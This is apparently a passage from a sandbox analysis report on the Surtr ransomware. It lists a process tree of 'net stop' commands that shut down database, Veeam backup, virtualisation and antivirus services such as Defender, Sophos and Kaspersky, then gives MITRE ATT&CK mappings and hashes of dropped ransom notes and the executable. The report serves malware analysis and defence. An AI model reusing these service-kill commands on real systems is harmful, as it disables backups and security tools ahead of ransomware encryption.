    PID:2764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQL_2008"
    3⤵
    PID:4056
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SQL_2008"
      4⤵
      PID:2852
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SQL_2008"
        5⤵
        
        PID:2768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SYSTEM_BGC"
    3⤵
    PID:3104
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SYSTEM_BGC"
      4⤵
      PID:2856
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC"
        5⤵
        
        PID:3096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPS"
    3⤵
    PID:2888
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$TPS"
      4⤵
      PID:2900
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$TPS"
        5⤵
        
        PID:3120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPSAMA"
    3⤵
    PID:2904
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$TPSAMA"
      4⤵
      PID:3112
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$TPSAMA"
        5⤵
        
        PID:2600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"
    3⤵
    PID:3116
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$VEEAMSQL2008R2"
      4⤵
      PID:2964
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"
        5⤵
        
        PID:3128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2012"
    3⤵
    PID:2124
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$VEEAMSQL2012"
      4⤵
      PID:2940
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012"
        5⤵
        
        PID:2880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLBrowser"
    3⤵
    PID:2120
  - - C:\Windows\system32\net.exe
      net stop "SQLBrowser"
      4⤵
      PID:2632
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLBrowser"
        5⤵
        
        PID:2808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLSafeOLRService"
    3⤵
    PID:2820
  - - C:\Windows\system32\net.exe
      net stop "SQLSafeOLRService"
      4⤵
      PID:2192
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLSafeOLRService"
        5⤵
        
        PID:2648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLSERVERAGENT"
    3⤵
    PID:2732
  - - C:\Windows\system32\net.exe
      net stop "SQLSERVERAGENT"
      4⤵
      PID:2156
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLSERVERAGENT"
        5⤵
        
        PID:2152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY"
    3⤵
    PID:1732
  - - C:\Windows\system32\net.exe
      net stop "SQLTELEMETRY"
      4⤵
      PID:2792
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLTELEMETRY"
        5⤵
        
        PID:2568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY$ECWDB2"
    3⤵
    PID:588
  - - C:\Windows\system32\net.exe
      net stop "SQLTELEMETRY$ECWDB2"
      4⤵
      PID:1936
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2"
        5⤵
        
        PID:2128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLWriter"
    3⤵
    PID:2952
  - - C:\Windows\system32\net.exe
      net stop "SQLWriter"
      4⤵
      PID:328
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLWriter"
        5⤵
        
        PID:1388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SstpSvc"
    3⤵
    PID:792
  - - C:\Windows\system32\net.exe
      net stop "SstpSvc"
      4⤵
      PID:900
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SstpSvc"
        5⤵
        
        PID:868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "svcGenericHost"
    3⤵
    PID:3076
  - - C:\Windows\system32\net.exe
      net stop "svcGenericHost"
      4⤵
      PID:1756
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "svcGenericHost"
        5⤵
        
        PID:1736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "tmlisten"
    3⤵
    PID:524
  - - C:\Windows\system32\net.exe
      net stop "tmlisten"
      4⤵
      PID:2452
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "tmlisten"
        5⤵
        
        PID:1476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "TrueKey"
    3⤵
    PID:964
  - - C:\Windows\system32\net.exe
      net stop "TrueKey"
      4⤵
      PID:3044
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "TrueKey"
        5⤵
        
        PID:1408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "UI0Detect"
    3⤵
    PID:2180
  - - C:\Windows\system32\net.exe
      net stop "UI0Detect"
      4⤵
      PID:2204
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "UI0Detect"
        5⤵
        
        PID:1580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamBackupSvc"
    3⤵
    PID:2092
  - - C:\Windows\system32\net.exe
      net stop "VeeamBackupSvc"
      4⤵
      PID:3188
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamBackupSvc"
        5⤵
        
        PID:3176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamBrokerSvc"
    3⤵
    PID:1600
  - - C:\Windows\system32\net.exe
      net stop "VeeamBrokerSvc"
      4⤵
      PID:1548
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamBrokerSvc"
        5⤵
        
        PID:3180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamCatalogSvc"
    3⤵
    PID:108
  - - C:\Windows\system32\net.exe
      net stop "VeeamCatalogSvc"
      4⤵
      PID:3204
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamCatalogSvc"
        5⤵
        
        PID:3244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamCloudSvc"
    3⤵
    PID:592
  - - C:\Windows\system32\net.exe
      net stop "VeeamCloudSvc"
      4⤵
      PID:1636
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamCloudSvc"
        5⤵
        
        PID:3196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamDeploymentService"
    3⤵
    PID:1820
  - - C:\Windows\system32\net.exe
      net stop "VeeamDeploymentService"
      4⤵
      PID:1792
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamDeploymentService"
        5⤵
        
        PID:3260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamDeploySvc"
    3⤵
    PID:812
  - - C:\Windows\system32\net.exe
      net stop "VeeamDeploySvc"
      4⤵
      PID:3272
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamDeploySvc"
        5⤵
        
        PID:852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamEnterpriseManagerSvc"
    3⤵
    PID:3276
  - - C:\Windows\system32\net.exe
      net stop "VeeamEnterpriseManagerSvc"
      4⤵
      PID:1804
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc"
        5⤵
        
        PID:3248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamMountSvc"
    3⤵
    PID:3212
  - - C:\Windows\system32\net.exe
      net stop "VeeamMountSvc"
      4⤵
      PID:2956
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamMountSvc"
        5⤵
        
        PID:628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamNFSSvc"
    3⤵
    PID:1744
  - - C:\Windows\system32\net.exe
      net stop "VeeamNFSSvc"
      4⤵
      PID:1076
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamNFSSvc"
        5⤵
        
        PID:3236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamRESTSvc"
    3⤵
    PID:2828
  - - C:\Windows\system32\net.exe
      net stop "VeeamRESTSvc"
      4⤵
      PID:2948
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamRESTSvc"
        5⤵
        
        PID:1108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamTransportSvc"
    3⤵
    PID:3292
  - - C:\Windows\system32\net.exe
      net stop "VeeamTransportSvc"
      4⤵
      PID:3264
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamTransportSvc"
        5⤵
        
        PID:3300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "W3Svc"
    3⤵
    PID:1252
  - - C:\Windows\system32\net.exe
      net stop "W3Svc"
      4⤵
      PID:2592
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "W3Svc"
        5⤵
        
        PID:3008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "wbengine"
    3⤵
    PID:3332
  - - C:\Windows\system32\net.exe
      net stop "wbengine"
      4⤵
      PID:2552
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "wbengine"
        5⤵
        
        PID:3068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "WRSVC"
    3⤵
    PID:2160
  - - C:\Windows\system32\net.exe
      net stop "WRSVC"
      4⤵
      PID:3336
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "WRSVC"
        5⤵
        
        PID:2380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"
    3⤵
    PID:2532
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$VEEAMSQL2008R2"
      4⤵
      PID:3340
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"
        5⤵
        
        PID:2268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"
    3⤵
    PID:2332
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$VEEAMSQL2008R2"
      4⤵
      PID:2516
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"
        5⤵
        
        PID:3348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamHvIntegrationSvc"
    3⤵
    PID:3064
  - - C:\Windows\system32\net.exe
      net stop "VeeamHvIntegrationSvc"
      4⤵
      PID:3344
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamHvIntegrationSvc"
        5⤵
        
        PID:3352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "swi_update"
    3⤵
    PID:2276
  - - C:\Windows\system32\net.exe
      net stop "swi_update"
      4⤵
      PID:2076
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "swi_update"
        5⤵
        
        PID:2244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$CXDB"
    3⤵
    PID:1228
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$CXDB"
      4⤵
      PID:1064
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$CXDB"
        5⤵
        
        PID:1340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$CITRIX_METAFRAME"
    3⤵
    PID:1480
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$CITRIX_METAFRAME"
      4⤵
      PID:2960
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME"
        5⤵
        
        PID:1680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQL Backups"
    3⤵
    PID:3396
  - - C:\Windows\system32\net.exe
      net stop "SQL Backups"
      4⤵
      PID:2472
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQL Backups"
        5⤵
        
        PID:2548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$PROD"
    3⤵
    PID:2284
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$PROD"
      4⤵
      PID:992
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$PROD"
        5⤵
        
        PID:3404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Zoolz 2 Service"
    3⤵
    PID:1824
  - - C:\Windows\system32\net.exe
      net stop "Zoolz 2 Service"
      4⤵
      PID:2248
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Zoolz 2 Service"
        5⤵
        
        PID:2784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper"
    3⤵
    PID:3420
  - - C:\Windows\system32\net.exe
      net stop "MSSQLServerADHelper"
      4⤵
      PID:2844
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLServerADHelper"
        5⤵
        
        PID:1392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROD"
    3⤵
    PID:1156
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$PROD"
      4⤵
      PID:2144
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$PROD"
        5⤵
        
        PID:3368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "msftesql$PROD"
    3⤵
    PID:428
  - - C:\Windows\system32\net.exe
      net stop "msftesql$PROD"
      4⤵
      PID:2256
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "msftesql$PROD"
        5⤵
        
        PID:2036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "NetMsmqActivator"
    3⤵
    PID:568
  - - C:\Windows\system32\net.exe
      net stop "NetMsmqActivator"
      4⤵
      PID:1452
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "NetMsmqActivator"
        5⤵
        
        PID:1892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "EhttpSrv"
    3⤵
    PID:520
  - - C:\Windows\system32\net.exe
      net stop "EhttpSrv"
      4⤵
      PID:2068
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "EhttpSrv"
        5⤵
        
        PID:2236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ekrn"
    3⤵
    PID:468
  - - C:\Windows\system32\net.exe
      net stop "ekrn"
      4⤵
      PID:1628
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ekrn"
        5⤵
        
        PID:2116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ESHASRV"
    3⤵
    PID:1048
  - - C:\Windows\system32\net.exe
      net stop "ESHASRV"
      4⤵
      PID:2372
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ESHASRV"
        5⤵
        
        PID:1604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SOPHOS"
    3⤵
    PID:2216
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SOPHOS"
      4⤵
      PID:3480
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SOPHOS"
        5⤵
        
        PID:1008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SOPHOS"
    3⤵
    PID:1924
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SOPHOS"
      4⤵
      PID:3496
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SOPHOS"
        5⤵
        
        PID:3472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "AVP"
    3⤵
    PID:3500
  - - C:\Windows\system32\net.exe
      net stop "AVP"
      4⤵
      PID:220
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "AVP"
        5⤵
        
        PID:208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "klnagent"
    3⤵
    PID:236
  - - C:\Windows\system32\net.exe
      net stop "klnagent"
      4⤵
      PID:224
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "klnagent"
        5⤵
        
        PID:3524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SQLEXPRESS"
    3⤵
    PID:3540
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SQLEXPRESS"
      4⤵
      PID:3580
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS"
        5⤵
        
        PID:2088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQLEXPRESS"
    3⤵
    PID:2912
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SQLEXPRESS"
      4⤵
      PID:2704
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS"
        5⤵
        
        PID:1728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "wbengine"
    3⤵
    PID:3596
  - - C:\Windows\system32\net.exe
      net stop "wbengine"
      4⤵
      PID:3676
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "wbengine"
        5⤵
        
        PID:3708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "HvHost"
    3⤵
    PID:3668
  - - C:\Windows\system32\net.exe
      net stop "HvHost"
      4⤵
      PID:3684
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "HvHost"
        5⤵
        
        PID:3692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmickvpexchange"
    3⤵
    PID:3700
  - - C:\Windows\system32\net.exe
      net stop "vmickvpexchange"
      4⤵
      PID:3740
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmickvpexchange"
        5⤵
        
        PID:3604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicguestinterface"
    3⤵
    PID:3620
  - - C:\Windows\system32\net.exe
      net stop "vmicguestinterface"
      4⤵
      PID:532
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicguestinterface"
        5⤵
        
        PID:3712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicshutdown"
    3⤵
    PID:3764
  - - C:\Windows\system32\net.exe
      net stop "vmicshutdown"
      4⤵
      PID:3768
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicshutdown"
        5⤵
        
        PID:3784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicheartbeat"
    3⤵
    PID:3776
  - - C:\Windows\system32\net.exe
      net stop "vmicheartbeat"
      4⤵
      PID:3788
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicheartbeat"
        5⤵
        
        PID:3796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmcompute"
    3⤵
    PID:3820
  - - C:\Windows\system32\net.exe
      net stop "vmcompute"
      4⤵
      PID:3908
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmcompute"
        5⤵
        
        PID:3832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicvmsession"
    3⤵
    PID:3880
  - - C:\Windows\system32\net.exe
      net stop "vmicvmsession"
      4⤵
      PID:3916
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicvmsession"
        5⤵
        
        PID:3972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicrdv"
    3⤵
    PID:3928
  - - C:\Windows\system32\net.exe
      net stop "vmicrdv"
      4⤵
      PID:3944
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicrdv"
        5⤵
        
        PID:3892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmictimesync"
    3⤵
    PID:3984
  - - C:\Windows\system32\net.exe
      net stop "vmictimesync"
      4⤵
      PID:3968
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmictimesync"
        5⤵
        
        PID:3996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicvss"
    3⤵
    PID:4000
  - - C:\Windows\system32\net.exe
      net stop "vmicvss"
      4⤵
      PID:3952
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicvss"
        5⤵
        
        PID:4044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VMAuthdService"
    3⤵
    PID:3960
  - - C:\Windows\system32\net.exe
      net stop "VMAuthdService"
      4⤵
      PID:4048
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VMAuthdService"
        5⤵
        
        PID:4064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VMnetDHCP"
    3⤵
    PID:4020
  - - C:\Windows\system32\net.exe
      net stop "VMnetDHCP"
      4⤵
      PID:4084
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VMnetDHCP"
        5⤵
        
        PID:4072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VMware NAT Service"
    3⤵
    PID:3084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VMUSBArbService"
    3⤵
    PID:2616
  - - C:\Windows\system32\net.exe
      net stop "VMUSBArbService"
      4⤵
      PID:2860
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VMUSBArbService"
        5⤵
        
        PID:3100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VMwareHostd"
    3⤵
    PID:3120
  - - C:\Windows\system32\net.exe
      net stop "VMwareHostd"
      4⤵
      PID:3108
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VMwareHostd"
        5⤵
        
        PID:2908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sense"
    3⤵
    PID:3124
  - - C:\Windows\system32\net.exe
      net stop "Sense"
      4⤵
      PID:2776
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sense"
        5⤵
        
        PID:2620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "WdNisSvc"
    3⤵
    PID:2664
  - - C:\Windows\system32\net.exe
      net stop "WdNisSvc"
      4⤵
      PID:2124
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "WdNisSvc"
        5⤵
        
        PID:2808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "WinDefend"
    3⤵
    PID:1668
  - - C:\Windows\system32\net.exe
      net stop "WinDefend"
      4⤵
      PID:2192
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "WinDefend"
        5⤵
        
        PID:3080

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2680

C:\Windows\system32\net.exe
net stop "Sophos MCS Client"
1⤵
PID:3056
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop "Sophos MCS Client"
  2⤵
  PID:848

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k swprv
1⤵
PID:3000

C:\Windows\system32\net.exe
net stop "MSSQL$SBSMONITORING"
1⤵
PID:2536

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT"
1⤵
PID:2336

C:\Windows\system32\net.exe
net stop "MSSQL$PROFXENGAGEMENT"
1⤵
PID:2136

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$SQL_2008"
1⤵
PID:2340

C:\Windows\system32\net.exe
net stop "MSSQL$SQL_2008"
1⤵
PID:2148

C:\Windows\system32\net.exe
net stop "MSSQL$TPSAMA"
1⤵
PID:2252
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop "MSSQL$TPSAMA"
  2⤵
  PID:1716

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$TPS"
1⤵
PID:2312

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQLFDLauncher"
1⤵
PID:1912

C:\Windows\system32\net.exe
net stop "MSSQLFDLauncher"
1⤵
PID:2972

C:\Windows\system32\net.exe
net stop "SQLAgent$SHAREPOINT"
1⤵
PID:4072
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT"
  2⤵
  PID:4084

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

File Deletion

T1107

Hidden Files and Directories

T1158

Indicator Removal on Host

T1070

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta

Filesize
8KB

MD5
c3df410a4e482aedc4f65be42d97daff

SHA1
8602bbe25e87df92110732ccadda2d96eb82f4cf

SHA256
18452592999fa1fce6ae4e5e42e2254aeff29cbb2c0f285cbe48d230e062d07a

SHA512
614771207b88ece3431780b9944a36c7c6da98f26f1d863c3af9acf33a7d2532897e3c9b6d161a3d0d9fff8236e05cf16368f5ce5cdbc0f6a5f7536332f9b725

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt

Filesize
621B

MD5
4c97b7389e84da2773ccb3443c234ae1

SHA1
7c66be6a0632a44ac2017e6e1bbd8f29809b61e2

SHA256
2d1c1b158ad44efd8f6c0db23fa516fd2ac7879f42382446ea714f670aa81058

SHA512
c7b41236f424452fb1a794fb3a372d6bcdc17e8d279ae3fd763f70e3d12261f768b1e69a6e30d70c3027ba730d21705ee63836f23d62616bf564c9a6069d7620

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exe

Filesize
320KB

MD5
e6fc190168519d6a6c4f1519e9450f0f

SHA1
af2080ddf1064fb80c7b9af942aaabf264441098

SHA256
8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980

SHA512
4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba

Download Submit
C:\ProgramData\Service\ID_DATA.surt

Filesize
14B

MD5
a400ab7041049318608e1a9271e99d16

SHA1
8898c1fc86590b8f2ec053a525e9f823b89c9c31

SHA256
60765c25fc2143cfffe60c358acd3d0ccb3cebb58c6a01028831ecc43d4bae64

SHA512
95753c9493e311773235b5c78a8d695e26db7d3e677883849bc8790e0d76941602a456f9185af60ad0251d2e76edfa5f214cdc3bacd4a07a2b402f36ac526f76

Download Submit
C:\ProgramData\Service\Private_DATA.surt

Filesize
1KB

MD5
a6d8b309d8fc19204b5bacccd10a3b23

SHA1
1fd075ce4724b9ef845da309bd34446ebea07670

SHA256
4fe478591626ae4b6722f50750be386acf31aae25f3afaa114d149958580753c

SHA512
